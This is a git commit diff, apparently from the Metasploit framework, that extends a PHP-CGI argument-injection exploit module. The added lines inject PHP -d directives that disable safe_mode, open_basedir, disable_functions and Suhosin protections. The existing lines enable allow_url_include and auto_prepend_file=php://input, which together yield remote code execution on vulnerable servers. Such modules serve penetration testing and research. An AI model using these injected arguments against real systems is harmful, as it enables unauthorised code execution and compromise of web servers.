Add additional definitions to disable safe_mode, open_basedir, suhosin. (thanks @i0n1c)

2012-05-04 12:15:05 -05:00 · 2012-05-04 12:15:05 -05:00 · c6b39e8e5c
parent 69b60b88f8
commit c6b39e8e5c
1 changed files with 4 additions and 0 deletions
--- a/modules/exploits/multi/http/php_cgi_arg_injection.rb
+++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@ -86,6 +86,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		begin
 			args = [
 				"-d+allow_url_include%3d#{rand_php_ini_true}",
+				"-d+safe_mode%3d#{rand_php_ini_false}",
+				"-d+suhosin.simulation%3d#{rand_php_ini_true}",
+				"-d+disable_function%3d%22%22",
+				"-d+open_basedir%3dnone",			
 				"-d+auto_prepend_file%3dphp://input",
 			]